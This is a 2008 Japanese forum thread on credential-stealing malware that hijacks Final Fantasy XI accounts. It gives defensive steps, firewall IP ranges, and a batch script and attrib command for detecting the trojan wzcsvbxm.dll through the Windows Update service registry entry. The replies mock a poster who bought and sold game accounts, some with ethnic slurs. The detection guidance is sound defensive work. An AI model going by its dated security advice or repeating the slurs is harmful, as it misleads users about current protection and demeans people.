全部 1- 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 最新50  

●● RMT業者の垢ハックが多発している件35 ●●

1 名前:既にその名前は使われています:2008/08/04(月) 16:19:23 ID:0brkH9mG
■このスレの目的
1:予防と自衛の徹底周知
2:被害報告の収集(※被害報告はテンプレを使用してください)
3:罠サイトURIの収集
4:被害者が現れた場合に対処をアドバイスする
前スレ ●● RMT業者の垢ハックが多発している件34 ●●
http://changi.2ch.net/test/read.cgi/ogame/1217322965/

■アカウントハックは多様化しています
 トラップサイトやツールのDLでハックウィルスに感染するだけではなく、一般的に使われるアプリケーション
 ソフトの脆弱性(ぜいじゃくせい)を利用してハックウィルスに感染させようとする手口も現れました。
 いままでのような危険なサイト・不審なサイトの閲覧あるいはトラップが仕掛けてあるリンクのクリックや
 ツールをDLしてアカハックされる以上に、ごく一般的なサイトに行っただけでトラップをもらう可能性が高い
 手口からの回避は、各ユーザーのインターネットへの安全性に対する危機意識の高さにかかっています。

★ハック対策、被害に遭ったときの対処は>>2-20あたり(レス番はズレる可能性があります)
★age進行(mail欄に何も書かない)でネ実民及びFF11プレイヤーへの周知と啓蒙にご協力ください。
★次スレは950前後で宣言して立ててください

2 名前:既にその名前は使われています:2008/08/04(月) 16:20:03 ID:IY5wsDOy
        i,,.+ ''"´ ̄ ̄ `"''|´\  _/|
      |   |,,.‐ ''"´ ̄ ̄ `"''|´\  _/|     ユッサ
    | |,.'^ァ'´           ',   `ア⌒ヽ!   |   ユッサ
    | / /    ,         ヽ、_ i   ',>  |
    | |.,' ,  / / / , ヽ.ヽ.  i ∠| i  | | ||
 o   |i ./  i /_,.ィ' ハ 、!,,_|__ハ  ',!.|  ', |   !
  。 ||. i   |/レ' |/   V _レ' |  .ト、',o ヽ. ゚
°  ノ.| | ./ |'==、   '弋二iフ| , | iヽ. 。 ',   これがほんとの垢ファック、なんつって
   !ヘ!.|ハ,. |////  ,  ////| ハノ .| ',  |    
ト、   ,'  i.ヽ!   rー-‐、  u ,.レ' |  i ', /./ /|
| ヽ, / i | .|>.、, ゝ   ノ ,.イ |  ! ハ ヽ! / |
| 、ノ\ヘ ,ハ| /_,.!ヘ`二ニ´,ヘ.|_| / / |ノ'´ヽ、_)|
',    `,ア''´ ̄7:::| \/  |::::Y  ̄`ヽi    /
. ヽ、'⌒/     i:::::|/}><{\|::::::i       Y⌒/
  ,.ゝ〈   、  |:::::::ヽ、ムゝ'":::::::| _,    〉く、
∠_____,.ゝ,r'"`ヽ!:::::::::::::Yo::::::::::::!ァ'" `ヽィ'_____,,ゝ|
 |    i  ',   ';:::::::::::}:::::::::::::::/   /´ .|     ||
 ||  |   ',   ',:::::::::i:o:::::::::/   /   i| |  ||

3 名前:既にその名前は使われています:2008/08/04(月) 16:20:23 ID:0brkH9mG
■リアルタイムで被害に遭われている方へ
不正アクセス被害への、スクエニの対応方法がが変わりました。「不正アクセスに関しては、インフォメーション
センターへのお電話ではなく、不正アクセス専用チャットサポートにてお問い合わせください」

不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
  受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
      (スクエニ公式ページトップ = ttp://www.playonline.com/ff11/index.shtml)

まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり) http://ort.sakura.ne.jp/taisai/
FF11Warning(アカハックについての対策とか詳しく載ってます) http://miku.a.orn.jp/miku2/
FFIX Virus問題 まとめサイト(初心者さん向け) http://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/

★「巻き戻し情報」「スクエニ社に法的責任を!」や「誰が悪いかランキング」「被害者の会を作れ」は別スレでお願いします。

●● FF11垢ハック巻き戻し状況報告スレ ●●(←別スレ)
http://changi.2ch.net/test/read.cgi/ogame/1216987350/

4 名前:既にその名前は使われています:2008/08/04(月) 16:21:20 ID:0brkH9mG
■各種ソフトのアップデート報告について

スレ内を検索しやすいように各種ソフトのupdate情報のレスには符丁をつけておくことを推奨します。

・FlashPlayerなどAdobe系ソフト ・Firefoxなどブラウザ ・NoScriptなどアドオン
などの更新があったときには
 ※※各種ソフトウェアアップデート情報※※

またセキュリティホールに関するニュースが出たときには
 ※※セキュリティホール情報※※

を付けてみてください。

5 名前:既にその名前は使われています:2008/08/04(月) 16:22:45 ID:0brkH9mG
----------アカハック被害報告用テンプレ(書ききれない場合は複数レスに分けて下さい)----------
●気付いた日時(アカハック被害に気付いた日時)
●不審なアドレスのクリックの有無(blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス、ドメインのドット(.)を○等で置き換える事。h抜き等は駄目)
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No)
●ID・Passの認証方法(POLに保存/自動ログイン/手打ち、途中で変更した場合はその履歴、例:自動ログイン→○月○日から手打ち、等)
●Pass変更の履歴(した/していない・していたならパスの最終更新日、等)
●他人が貴方のPCを使う可能性の有無(Yes/No)
●ツールの使用の有無:Yes/No・Yesの場合はそのToolの説明
●ネットカフェの利用の有無:Yes/No
●使っているOS(SP等まで書く)
●使用ブラウザ(バージョン等まで分かれば書く)
●WindowsUpdateの有無(最終更新日、等)
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し)
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)
●その他のSecurty対策(Spybot S&D、ルータ、等)
●ウイルススキャン結果(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等)
●スレログやテンプレを読んだか(Yes/No/今から読みます)
●hosts変更(有/無・有りの場合は最終更新は何時ごろか)
●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか)
●その他情報・症状など(書ききれない場合は次レスで書いてください)

6 名前:既にその名前は使われています:2008/08/04(月) 16:25:46 ID:0brkH9mG
■具体的な自衛策その1(詳細は「>>1」の FF11Warningさんのところをじっくり読まれることをお勧めします)
1:ウイルススキャンソフト(ウィルス駆除ソフト)を導入する。
2:Windows UpdateでWindowsを最新の状態にする。
3:ファイアウォールを有効にする。
   有料ソフト等に同梱されているもの(同梱でなければ同じ会社から出ているもの)を使うか、フリーの
   ファイアウォールソフトを探し導入する(2chカテゴリ「ネット関係」>「セキュリティ」板にフリーの
   ファイアウォールソフトのスレッドがあります。「ファイアウォール」などの単語で検索してください)
4:PeerGuardian2(IPフィルタソフト)を導入する。
  ※リネージュ資料室からリンクされているHPにて配布されているPeerGuardian2日本語版がダウンロード
   できない模様(8月4日報告)。メニューは同じなので日本語マニュアルページと解説HPみながら英語版で。
   ★PG2公式 = ttp://phoenixlabs.org/pg2/
   ★DLページ(日本語サイト) = ttp://cowscorpion.com/Firewall/PeerGuardian.html
   ★日本語マニュアル = ttp://www.dukedog.flnet.org/Library/PG2/PG_Guide.html
  ※設定方法はここから
   ★リネージュ資料室 ttp://lineage.paix.jp/guide/security/basic-ipfilter.html
   ★PG2導入解説動画(改訂版)ニコ動 ttp://www.nicovideo.jp/watch/nm2825098
5:Firefox、Opera、Safariなど、IE以外のウェブブラウザを使用する。
  それぞれのブラウザにセキュリティホールが見つかることもあるので、アップデート情報には注意してください。
6:ネ実・mixi・ブログ等にある不審なURLを踏む場合は、まず「aguse.jp」や「ソースチェッカー」を使用する。
  ★aguse GATEWAY = ttp://www.aguse.jp/  ★ソースチェッカーオンライン = ttp://so.7walker.net/

7 名前:既にその名前は使われています:2008/08/04(月) 16:28:05 ID:0brkH9mG
■具体的な自衛策その1(詳細は「>>1」の FF11Warningさんのところを・・・

のレス番は >>1 ではなく >>3 です m(_ _)m

8 名前:既にその名前は使われています:2008/08/04(月) 16:28:42 ID:0brkH9mG
■具体的な自衛策その2
7:SecuniaPSI(各種アプリケーション・プラグインソフトが最新版であるかどうかをチェックするソフト)の導入。
   ★Secunia公式ページ = ttps://psi.secunia.com/
   ★SecuniaPSI RC3ダウンロードページ(日本語解説付き) = ttp://cowscorpion.com/Security/SecuniaPSI.html
8:プラグイン他、各種ソフトの更新
  Flashplayer、Realplayer、Shockwaveplayer、Quicktime、Adobe Acrobat/ReaderなどのソフトはOSやブラウザの
  更新と同じように更新を怠り無く。
   ★FlashPlayerのバージョン確認 = ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
   最新(現在は 9.0.124.0)未満の場合
   ★Adobeアップデート ttp://www.adobe.com/jp/downloads/updates/ で更新するか
   ★Adobeダウンロード ttp://www.adobe.com/jp/downloads で最新版と入れ替えてください。
   ※FlashPlayerはウェブブラウザごとに更新する必要があります。IEとFx使用なら両方で更新しましょう。
9:HIPS(レジストリや設定ファイルの変更を監視するソフト)の導入。
  Unleak・Spybot(Teatimer)などのレジストリ変更を監視してくれるソフトを入れておくと、今回のような
  レジストリ改ざんで動作するウィルスに対して「レジストリが変更される前に変更を許可するかどうかを
  問い合わせてくれる」ので「怪しい」と思った場合はそれを拒否することによってウィルスの活動を阻害し
  症状の発症を食い止めてくれます。
   ★Unleak = ttp://soft3304.net/Unleak/  ★Spybot = ttp://www.spybot.info/jp/
   ※レジストリ(あるいはシステム)を監視するソフトは複数入れると動作に問題が出ますから注意です。

9 名前:既にその名前は使われています:2008/08/04(月) 16:29:44 ID:0brkH9mG
■警察への被害届け
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
  都道府県警察本部のサイバー犯罪相談窓口等一覧 = ttp://www.npa.go.jp/cyber/soudan.htm
2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
  (この段階を踏まずに直接所轄署に行くと「専門の窓口に連絡しろ」と言われてしまう可能性があります)
3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。
4:資料を持参して所轄の署に赴き「利用権の侵害」での被害を報告します。
  「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが
  家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
  利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。
■警察へ行く際に持っていく・用意しておくもの(過去スレで実際に警察へ行った被害者のレスから抜粋)
持っていったもの
 ●身分証明、印鑑  ●スクエニの会社情報  ●HPのプリントアウトしたもの
 ●プレイオンラインサポセンの電話番号(受け答えしてくれたサポセンの人の名前も伝えるといいかも)
警察で聞かれたもの
 ●プレイオンラインのIDとパスワード  ●キャラ名  ●犯行時間帯
 ●被害内容(なくなったゲーム内通貨・アイテム) ●プロバイダ

10 名前:既にその名前は使われています:2008/08/04(月) 16:30:37 ID:0brkH9mG
■POL用ファイアーウォールの設定(アプリケーションルールでpol.exeの設定)
※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。
 現在、上記に該当する既知のものはwzcsvbxm.dllを使う3種のみです。
※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。
許可しているリモートIPの範囲
61.195.48.0-61.195.55.255 (61.195.48.0/21)
61.195.56.0-61.195.59.255 (61.195.56.0/22)
61.195.60.0-61.195.63.255 (61.195.60.0/22)
202.67.48.0-202.67.63.255 (202.67.48.0/20)
219.117.144.0-219.117.159.255 (219.117.144.0/20)
※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○
※FWによっては()内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合()内の数値を使用すると
 設定が簡単になります。

空けているローカルポート TCP1024-65535 UDP50000-65535
空けているリモートポート TCP25,80,110,443 ,50000-65535 UDP50000-65535
※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください)

11 名前:既にその名前は使われています:2008/08/04(月) 16:32:34 ID:0brkH9mG
ここまで一般テンプレ

なお、PG2の日本語版がDLできない件については、あちらサイトがメンテか
CGIサーバに不具合が出ている可能性もありますので、経過を見てください

以下「wzcsvbxm.dll」に対する臨時テンプレ

12 名前:既にその名前は使われています:2008/08/04(月) 16:33:32 ID:0brkH9mG
■「wzcsvbxm.dll」への感染に関して
感染の前兆症状(報告があったもの) ※感染していると思われるPCの症状
1:Windows Updateがフリーズする。
2:POLを起動するとエラーが出る(2回目からは正常に起動)
3:シャットダウンに時間がかかるようになった(「コンピュータの電源を切る」が表示されるまでに2分以上かかる)
4:POLを起動するとsvshost.exeによるPOL.exe干渉警告が出る。
5:アプリケーションの追加と削除を選択して表示されるまでに時間がかかるようになった。

また、感染の確認方法として

スタートボタン(あるいはExplorerから)→「マイ コンピュータ」を右クリック→メニューから「管理」を実行
→「コンピュータの管理」ウィンドウの左のツリーから「サービスとアプリケーション」→「サービス」を選択。
選択したとき、右窓の「Automatic Updates」を選んで表示される説明が「Windowsの更新のダウンロードと〜」
のように日本語で表示されるかを確認。
トロイの木馬wzcsvbxm.dllは欧文の説明文を内部に持っているので、説明文が「Enables the download and 〜」に
なっていたら感染の疑いありです(System32フォルダ内にwzcsvbxm.dllがいないかどうか探してください)

13 名前:既にその名前は使われています:2008/08/04(月) 16:34:41 ID:0brkH9mG
■「wzcsvbxm.dll」がPCに存在するか調べる方法(1)
Explorerで検索する場合は「ツール→フォルダオプション→表示タブ」で「ファイルとフォルダの表示」が
「すべてのファイルとフォルダを表示する」の選択がされていることと「保護されたオペレーティングシステム
ファイルを表示しない(推奨)」のチェックを外してあることを確認。マイコンピュータ上で「右クリック→検索
→ファイルとフォルダすべて→詳細設定オプション」で「システムフォルダの検索」「隠しファイルとフォルダの
検索」「サブフォルダの検索」にチェックを入れて検索してください。

■「wzcsvbxm.dll」がPCに存在するか調べる方法(2)
コマンドプロンプト(スタート→プログラム→アクセサリにあります)を開いて、そこに
attrib %SystemRoot%\system32\wzcsvbxm.dll /s -s -h -r ←をコピペしてenter
存在しない場合 = 「ファイルが見つかりません-○:\WINDOWS\system32\wzcsvbxm.dll」(○はドライブ名)
存在する場合 = 何も表示されず次のコマンド受付状態になるので、System32フォルダを開いて探せば見つかります。

■「wzcsvbxm.dll」の検索結果について
1:wzcsvbxm.dllが「%SystemRoot%\system32」のディレクトリに見つからなければ、wzcsvbxm.dllに関しては
  感染していません(%SystemRoot%はシステムがいるHDD上のディレクトリ表示。たとえばC:\WINDOWS)
2:wzcsvbxm.dllが「HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\」などに見つかった
  場合、検索した履歴を保存しているだけなので放置して大丈夫です(HKEYと付くのはレジストリ)

14 名前:既にその名前は使われています:2008/08/04(月) 16:36:08 ID:0brkH9mG
■「wzcsvbxm.dll」がPCに存在するか調べる方法(3)
「(このレスをコピペ)」と書いてあるレスをエディタにコピペして***.bat(***の部分はなんでも○)で
保存し、保存したらExplorer上からでもダブルクリック。
※テキストエディタにワードバットなどリッチテキストで保存できるエディタの場合、リッチテキスト形式で
 ファイルを作って保存すると動きませんので、保存はテキストドキュメントで行ってください。
ダブルクリックなどで動作させたら、それが終わるまでに10秒ほどかかります。
「続行するには何かキーを押してください...」が出てくるまでお待ちください。
※これを実行した結果表示の★の部分になにも表示されないPC環境もあるようです。
 他の検索方法を試してwzcsvbxm.dllがPC内にいるかいないかをあわせて確認してください。

15 名前:既にその名前は使われています:2008/08/04(月) 16:37:10 ID:0brkH9mG
@echo off && REM REG.EXE ver3.0 (このレスをコピペ)
for /L %%i in (1, 1, 9) do (reg query HKLM\SYSTEM\ControlSet00%%i > NUL 2>&1
if ERRORLEVEL 1 call :nai
if ERRORLEVEL 0 call :aru %%i)
for /L %%i in (10, 1, 99) do (reg query HKLM\SYSTEM\ControlSet0%%i > NUL 2>&1
if ERRORLEVEL 1 call :nai
if ERRORLEVEL 0 call :aru2 %%i)
reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters
echo =========================================================================
sc qdescription wuauserv
pause
goto :EOF
:nai
exit /b -1
:aru
reg query HKLM\SYSTEM\ControlSet00%1\Services\wuauserv\Parameters
exit /b
:aru2
reg query HKLM\SYSTEM\ControlSet0%1\Services\wuauserv\Parameters
exit /b

16 名前:既にその名前は使われています:2008/08/04(月) 16:38:02 ID:0brkH9mG
■上記バッチファイルを実行した例(★の部分が違ってたらヤバイかも)
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll ←★

! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll ←★

! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll ←★
=========================================================================
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: wuauserv
DESCRIPTION : Windows ←★
続行するには何かキーを押してください...

17 名前:既にその名前は使われています:2008/08/04(月) 16:39:33 ID:0brkH9mG
■レジストリからwzcsvbxm.dllを探す方法
スタート→ファイル名を指定して実行→regedit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSetxxx(xxxは数字)\Services\wuauserv\Parametersと
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parametersの中の
「ServiceDll」→「REG_EXPAND_SZ(種類)」の「データ」を確認

C:\WINDOWS\system32\wuauserv.dllならそのままクローズ(この件の感染はしていない)
C:\WINDOWS\system32\wzcsvbxm.dllなど上記以外のファイルが登録されていた場合、感染している可能性が極めて大。
まず安全な環境でパスを変更しwzcsvbxm.dllをwuauserv.dllに書き換えられるなら書き換える等の対策をする。
ただし、すぐに戻ってしまう報告もあるため修正後要確認。
本体(生成元)および感染ルートは現状不明なため、上記の修正をしたとしても完全に駆除されているか分かりませんので
最終的な回答は「感染が確認された場合はクリーンインストール推奨」ということになります。

18 名前:既にその名前は使われています:2008/08/04(月) 16:41:06 ID:0brkH9mG
ここまで「wzcsvbxm.dll」に対する臨時テンプレ

19 名前:既にその名前は使われています:2008/08/04(月) 16:59:10 ID:G5YpyjYw
>>1
(・ω・`)乙 これは乙じゃなくてポニーテールうんたらかんたら


20 名前:既にその名前は使われています:2008/08/04(月) 17:26:18 ID:qamyPg/T
>>1 お疲れ様ー

21 名前:既にその名前は使われています:2008/08/04(月) 18:05:37 ID:Ww9v6dMQ
>>6に張ってあるCow&Scorpionはアドウェアを堂々配布してる胡散臭いサイトなので注意。

22 名前:既にその名前は使われています:2008/08/04(月) 19:44:50 ID:exHYDJwf
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【AMD/ATI】 HD4xxxシリーズ Part56 【RADEON】 [自作PC]
【G'zGEAR】 au WIN G'zOne W62CA by CASIO Part20 [携帯機種]
【G'zGEAR】 au WIN G'zOne W62CA by CASIO Part19 [携帯機種]
□自殺決行する前に身辺整理-11□ [メンヘルサロン]
Samurize Part 42 [ソフトウェア]

自殺するほどじゃないだろ・・・

23 名前:既にその名前は使われています:2008/08/04(月) 19:49:03 ID:rmZLQZYv
みんなで辞めようぜ

24 名前:886:2008/08/04(月) 19:50:49 ID:FRmdJN3c
垢買いしたのを垢ハックされて困ったDQNです。今帰宅しました。
とりあえず、今別垢からGMコールしてます・・・。

25 名前:既にその名前は使われています:2008/08/04(月) 19:53:24 ID:tDKsZfXt
おまw
どうやって説明する気だよ

26 名前:既にその名前は使われています:2008/08/04(月) 19:56:38 ID:PP9RuoO3
相当おつむ怪しいね

27 名前:886:2008/08/04(月) 19:56:54 ID:FRmdJN3c
こうなったら、俺もBANされていいので、中華と一緒に自爆する覚悟。
個人情報言わなきゃ凍結できないと言われたら、上記の旨も伝える。
捨てアカからGMコールしてるからこれが無くなってもいい。
結局個人情報ないとGMコールも無駄になりますかね?
泣き寝入りしたほうがいいのかな?

28 名前:既にその名前は使われています:2008/08/04(月) 19:58:31 ID:PP9RuoO3
なんでRMTが無くならないか

なんで垢ハック無くならないのか

君みたいに買う人がいるからですよ

それがどうして同情とか得られると思います?

被害者気取って書き込む神経が分からないのです

29 名前:既にその名前は使われています:2008/08/04(月) 19:59:24 ID:tR7cH9Rz
実況されてもうぜーから結果だけ書け
1ヶ月後とかだろうけどな

30 名前:886:2008/08/04(月) 19:59:36 ID:FRmdJN3c
ま〜、なんというか中華にハックされたと思ってますが
ファーストオーナーからアカハックされたとウソ付かれて新しいパス貰って
入って・・。ってやられたらおしまいだな。

ffxi ahみたら、種族手売られてた履歴が合ったよ。
あと、モ75でデストもってんだけど、なぜかワーグバグナウ買った履歴が。ワカンネ・・・。

31 名前:既にその名前は使われています:2008/08/04(月) 20:01:36 ID:+6H7B2aJ
なにこの脳みそ茹だってそうな人
ここに書き込む神経がわかりません

32 名前:既にその名前は使われています:2008/08/04(月) 20:02:19 ID:0brkH9mG
ネタは前スレが埋まってないからそっちで推奨

33 名前:既にその名前は使われています:2008/08/04(月) 20:02:20 ID:gvYrTfIs
どうせそのキャラはお前が育てたわけじゃねーんだし、気にするなよ。
また買えばいいだろ、な^^


そしたらキャラ名教えてくれよな^^

34 名前:886:2008/08/04(月) 20:05:09 ID:FRmdJN3c
>>33
いや、そのキャラね、買ったとき後衛ジョブ最大37だったのを75にしたのよ。
あと、合成0だったのを師範にしたのよ。
キャラ名は教えてもいいんだけどなー。LSとかフレに迷惑掛けるからな。

35 名前:既にその名前は使われています:2008/08/04(月) 20:09:45 ID:ML+ODa/g
FRmdJN3cは ここで何したいわけ?
アカ買いが書き込んでも荒れるだけなんだけど荒らしたいの?

36 名前:既にその名前は使われています:2008/08/04(月) 20:13:24 ID:MygMqC2M
無くならない垢買いの抑制になるかもしれないから、書き込むくらいは良いんじゃないかな。
実況や言い訳はいらないから、結果だけ宜しく。
鯖とキャラ名も教えてくれればサーチして、今一緒にいるやつが犯人!って分かるかもだけど。


37 名前:既にその名前は使われています:2008/08/04(月) 20:14:03 ID:rmZLQZYv
俺もハクられたんで即PCクリーンインスコして
パスワード再発行してもらって即POL退会したよ
100%安全でない限りまた垢ハックされる事もありえるんで
自宅PCからインターネットに繋ぐのも辞めるつもり

38 名前:既にその名前は使われています:2008/08/04(月) 20:15:17 ID:0brkH9mG
★「巻き戻し情報」「スクエニ社に法的責任を!」や「誰が悪いかランキング」「被害者の会を作れ」は別スレでお願いします。

●● FF11垢ハック巻き戻し状況報告スレ ●●(←別スレ)
http://changi.2ch.net/test/read.cgi/ogame/1216987350/

39 名前:既にその名前は使われています:2008/08/04(月) 20:26:05 ID:gvYrTfIs
>>34
そんな糞アカ、逆に買う価値が無いじゃねーか。
嘘くさい話を堂々とするな。

40 名前:既にその名前は使われています:2008/08/04(月) 20:31:52 ID:zvOMnz9k
>>34
そこまでのしょぼいキャラなら1から育てればよかったのにーーw
もったいないだろうが

41 名前:886:2008/08/04(月) 20:38:49 ID:FRmdJN3c
>>40
でも前衛ジョブ2個75で、大袖とかもってるのに38,000円で買えたからな。

42 名前:既にその名前は使われています:2008/08/04(月) 20:40:34 ID:gvYrTfIs
バカじゃねーの…。
結局それじゃねーか。
それはお前が育てたジョブとはいえねーよ。

43 名前:既にその名前は使われています:2008/08/04(月) 20:42:50 ID:+6H7B2aJ
>>41
垢買い自慢は【いりません。】

これ以上はスレでもたてて勝手にやってろ

44 名前:886:2008/08/04(月) 20:45:27 ID:FRmdJN3c
GMコールしたら、ワールドとキャラ名だけで一時凍結してくれたよ!
復帰は出来ないが、これで俺も二度と復帰できない、中華も使えない。
まあ、中華は他の奴にアイテム、ギルを送ったかもだがな・・・。
こんな感じで今回の騒動は終わりました。
俺と同じ状況の人いたらご参考に。
では・・・。リアルで頑張って生きます。

45 名前:既にその名前は使われています:2008/08/04(月) 20:46:07 ID:0brkH9mG
うざいな垢買い推奨の業者め

46 名前:既にその名前は使われています:2008/08/04(月) 20:47:12 ID:45uPIC7b
やはり前スレ886は、ただのバカだったか……
今どきアンチウィルスソフト入れてない、WinUpdateすらしてないなんて、
いくら何でも正常じゃないとは思っていたが……。


47 名前:既にその名前は使われています:2008/08/04(月) 20:48:03 ID:+6H7B2aJ
>>46
その上アカ買って自慢してる馬鹿ですし、お寿司

48 名前:既にその名前は使われています:2008/08/04(月) 20:49:41 ID:DqQuyrYF
垢買ってる時点で中華と同類

49 名前:既にその名前は使われています:2008/08/04(月) 20:50:08 ID:6tA7JQO+
だな。
垢買った理由が謎すぎる。

ってことで、GMコールの結果と
垢の値段・買った理由をよろしく。

50 名前:既にその名前は使われています:2008/08/04(月) 20:52:11 ID:grKfPZZW
973 :既にその名前は使われています :2008/08/04(月) 17:16:49 ID:j2hDP0O9
2台のPCでちょっと試したんだが・・・
メンバーパスワードとか、セキュリティ設定とかって、なんの意味もないのな。
片方のPCで上記のものを設定しても、もう片方のPCで、全く関係なくログイン可能。

51 名前:既にその名前は使われています:2008/08/04(月) 20:52:23 ID:6tA7JQO+
俺リロード汁orz

52 名前:既にその名前は使われています:2008/08/04(月) 20:52:30 ID:gvYrTfIs
/anonシーフで低レベル狩り場を乱獲しまくった886の姿が目に浮かぶぜ…。

53 名前:既にその名前は使われています:2008/08/04(月) 20:54:16 ID:hOY9+EVV
ギルを買うとかツール使うとかということをやろうという感覚がさっぱりわからんのよね
過ぎたことを望まないでおけば普通に遊べる世界だろうに
まあ、レベル75がないと満足に動けないという人もいるかもだけど・・

54 名前:既にその名前は使われています:2008/08/04(月) 20:54:49 ID:rmZLQZYv
中華は垢を売るから
同類じゃなくて中華のお客さんなんじゃ

55 名前:既にその名前は使われています:2008/08/04(月) 21:00:10 ID:DqQuyrYF
アカハクの根っこにある「RMT市場」に関与してる時点で中華と同類

と ここまで噛み砕いて書いてあげないと理解できませんか

56 名前:既にその名前は使われています:2008/08/04(月) 21:05:39 ID:rmZLQZYv
なんでそんなにイラついてんの

57 名前:既にその名前は使われています:2008/08/04(月) 21:13:08 ID:RX6QHB2D
RMTサイトでギル買ってパス抜き感染後
後でアカごとごっそりうまーな業者の図式な訳ですね
なりふり構わない業者オソロシス

58 名前:既にその名前は使われています:2008/08/04(月) 21:15:40 ID:9cL1xZhV
もちつけ

59 名前:既にその名前は使われています:2008/08/04(月) 21:16:08 ID:tR7cH9Rz
そして886みたいな奴が買うわけですね

60 名前:886:2008/08/04(月) 21:19:44 ID:FRmdJN3c
>>49
分かった。
アカ買った理由は・・・。実は2002年に初めて、2005年で辞めたキャラが居た。
それ解約して人に売ったんだよ。

2007年になって急にやりたくなった。でも前に使ったキャラ売った、困った。
俺のキャラに似てるのをヤフオクで探すと見つかった。じゃこれ買った。
約1年手塩を掛けて育てた。38000円で買って、今は8万くらいの価値のあるアカになった。
RMTで買わず、1000万ギルためたし。

61 名前:既にその名前は使われています:2008/08/04(月) 21:22:20 ID:tR7cH9Rz
キャラ買いの上にキャラ売りかよ
どうしようもないな

62 名前:既にその名前は使われています:2008/08/04(月) 21:23:16 ID:gvYrTfIs
おいおい、どんどん話がうさんくさくなってきたな。

63 名前:既にその名前は使われています:2008/08/04(月) 21:23:16 ID:P9R5gJAK
いい加減にしろ 犯罪者の愚痴聞いてやるスレじゃねぇんだよ

64 名前:既にその名前は使われています:2008/08/04(月) 21:28:04 ID:qamyPg/T
>>前866 お疲れ様。
もう来ないだろうけど、そのアカウントをいつ頃買ったかとウィンドウズXPが正規版かどうかは知りたかったな。


65 名前:既にその名前は使われています:2008/08/04(月) 21:29:25 ID:gvYrTfIs
つか、LSメンには連絡絶対しないほうがいいな。
こんな糞野郎がリーダーだったと知ったら、さぞ嫌な思いをするだろうから。

66 名前:既にその名前は使われています:2008/08/04(月) 21:29:48 ID:G5YpyjYw
どうせまた垢買うんだろ。こいつは。

67 名前:既にその名前は使われています:2008/08/04(月) 21:32:01 ID:WJhuRYeO
もう構ってチャンに構うのはやめろww 話が全然関係ない方向に行き過ぎる

68 名前:既にその名前は使われています:2008/08/04(月) 21:33:09 ID:Y7tMkrCf
思わぬ落とし穴ってかんじだなー

69 名前:既にその名前は使われています:2008/08/04(月) 21:45:24 ID:45uPIC7b
どうも前スレ886は、後でボロボロいろんな話が出て来るし、釣りくさいなあw
釣りでなければ、真性の既知害だわw

70 名前:既にその名前は使われています:2008/08/04(月) 21:58:15 ID:ATCRK6rk
38000円もあれば旨いメシ食いに行くとか、服買うとかすりゃいいのに何でゲームのキャラなんか買うんだ
他人が育てたキャラなんぞキモくね?
それともアカ買いするバカは根本的に感覚が違うのか。モラルが特ア並みに無いのは分かってるが

ところでネタじゃなければ866のPCはウィルスだらけだろうからクリーンインスコしとけ
不特定多数にお前の情報が送信されてる可能性もあるぞw

71 名前:既にその名前は使われています:2008/08/04(月) 22:00:54 ID:eTuTIoLg
垢買いは普通じゃないどこかの社長さんとかどこかの議員さんの息子とか芸能人の駄目息子とか
その辺が買うんです。
FFに限らずネットゲームはみんなそうなんだとさw
平気で数十万とか出すらしいですぜ。流石に一般人はRMT止まりかと、、

72 名前:既にその名前は使われています:2008/08/04(月) 22:19:47 ID:tR7cH9Rz
垢買いもRMTの一形態でしょ

73 名前:既にその名前は使われています:2008/08/04(月) 22:57:04 ID:2OlqsGjj
>>70
ヒント:価値観は人それぞれ

74 名前:既にその名前は使われています:2008/08/04(月) 23:10:02 ID:45uPIC7b
気軽なワールド移転の実装が、確実に垢買いに拍車をかけたよなあ・・・

75 名前:既にその名前は使われています:2008/08/04(月) 23:16:40 ID:zvOMnz9k
取りあえず、垢買うとこうなるのねw
おつでした〜w今度は1からやりましょう〜

76 名前:既にその名前は使われています:2008/08/04(月) 23:21:41 ID:CbtlXcko
コイツの場合1からやってもハクられてた悪寒w

77 名前:既にその名前は使われています:2008/08/04(月) 23:41:06 ID:6NYQUikD
価値観云々よりも、このスレに書ける神経が異常。
